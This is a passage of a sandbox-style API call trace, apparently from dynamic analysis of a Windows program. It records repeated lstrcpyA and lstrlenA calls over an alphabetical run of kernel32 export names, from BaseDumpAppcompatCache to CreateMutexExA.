lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.276] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.276] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.276] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.276] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.276] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.276] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.276] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.277] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.277] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.277] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.277] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.277] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.277] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.277] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.277] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.277] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.277] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.277] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.277] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.277] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.277] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.277] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.277] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.277] lstrlenA (lpString="BEEP") returned 4 [0082.277] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.277] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.278] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.278] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.278] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.278] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.278] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.278] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.278] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.278] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.278] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.278] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.278] lstrlenA (lpString="CANCELIO") returned 8 [0082.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.278] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.278] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.278] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.278] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.278] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.278] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.278] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.278] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.279] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.279] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.279] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.279] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.279] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.279] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.279] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.279] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.279] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.279] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.279] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.279] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.279] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.279] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.279] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.279] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.279] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.279] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.279] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.279] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.280] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.280] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.280] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.280] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.280] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.280] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.280] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.280] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.280] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.280] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.280] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.280] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.280] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.280] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.280] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.280] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.280] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.280] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.280] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.281] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.281] lstrlenA (lpString="COPYFILEA") returned 9 [0082.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.281] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.281] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.281] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.281] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.281] lstrlenA (lpString="COPYFILEW") returned 9 [0082.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.281] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.281] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.281] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.281] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.281] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.281] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.281] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.281] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.281] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.281] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.281] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.281] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.282] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.282] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.282] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.282] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.282] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.282] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.282] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.282] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.282] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.282] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.282] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.282] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.282] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.282] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.282] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.282] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.282] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.282] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.282] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.282] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.283] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.283] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.283] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.283] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.283] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.283] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.283] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.283] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.283] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") 